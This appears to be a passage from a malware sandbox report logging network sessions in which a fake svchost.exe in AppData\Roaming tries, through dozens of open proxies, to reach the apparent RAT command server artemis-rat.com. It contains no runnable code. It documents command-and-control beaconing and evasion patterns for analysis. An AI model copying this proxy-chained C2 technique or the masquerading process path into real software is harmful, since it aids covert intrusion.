                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 64 66 67 68 68 73 64 66 67 68 40 61 73 64 66 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at dfghhsdfgh@asdf.com to inform them of the time this e
                                                                                    Mar 9, 2024 13:14:35.547314882 CET303INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                                                                                    Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3202192.168.2.560178193.84.89.202844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.593178988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.270900965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177875996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3203192.168.2.560254147.75.92.2518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.602927923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.877989054 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3204192.168.2.560181219.243.212.118808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.615148067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.943542004 CET22INHTTP/1.1 502 ERROR


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3205192.168.2.56024713.37.89.201312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.622951984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.920686960 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3206192.168.2.56028151.158.122.481637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.623097897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.270956993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177876949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3207192.168.2.5602308.217.44.2291567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.626339912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3208192.168.2.560236172.104.251.1798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.626828909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.928423882 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3209192.168.2.56017782.137.244.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.643426895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3210192.168.2.560245185.38.111.1808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.647227049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.972780943 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:35.330100060 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3211192.168.2.560308185.103.101.391005143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.659142971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3212192.168.2.560249221.224.44.91730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.660265923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3213192.168.2.56029043.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.665611029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3214192.168.2.560204178.128.82.1053322543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.667243958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.380319118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.474508047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677418947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3215192.168.2.5601625.44.42.1155838643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.750091076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3216192.168.2.560330142.54.232.6414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.750149965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3217192.168.2.56032323.137.248.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.750212908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3218192.168.2.55887450.63.12.101609543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.750258923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3219192.168.2.56021447.91.104.88312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.750802040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.163369894 CET214INHTTP/1.1 503 Service Unavailable
                                                                                    content-length: 107
                                                                                    cache-control: no-cache
                                                                                    content-type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3220192.168.2.560376172.67.181.98043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.752809048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.906939030 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3221192.168.2.560380104.19.109.2098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.754446983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.908891916 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3222192.168.2.560324119.23.148.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.756660938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.377120018 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx
                                                                                    Mar 9, 2024 13:14:35.378061056 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 aa 28 ed 75 6c 1a 2a cf 36 35 6e b6 f5 d4 76 b4 08 f5 d8 ef aa 79 70 a7 59 15 67 b0 b5 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR(ul*65nvypYg*,+0/$#('=<5/Uartemis-rat.com#


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3223192.168.2.56035645.191.75.18699943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.768496990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.512680054 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3224192.168.2.560378137.184.15.145800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.772756100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3225192.168.2.5603298.210.80.1911567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.774374008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3226192.168.2.559997192.111.137.35414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.778980970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3227192.168.2.55940164.56.150.102312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.786406040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.038182020 CET1254INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.28
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 952
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ah_test
                                                                                    Via: 1.1 ah_test (squid/3.5.28)
                                                                                    Connection: close
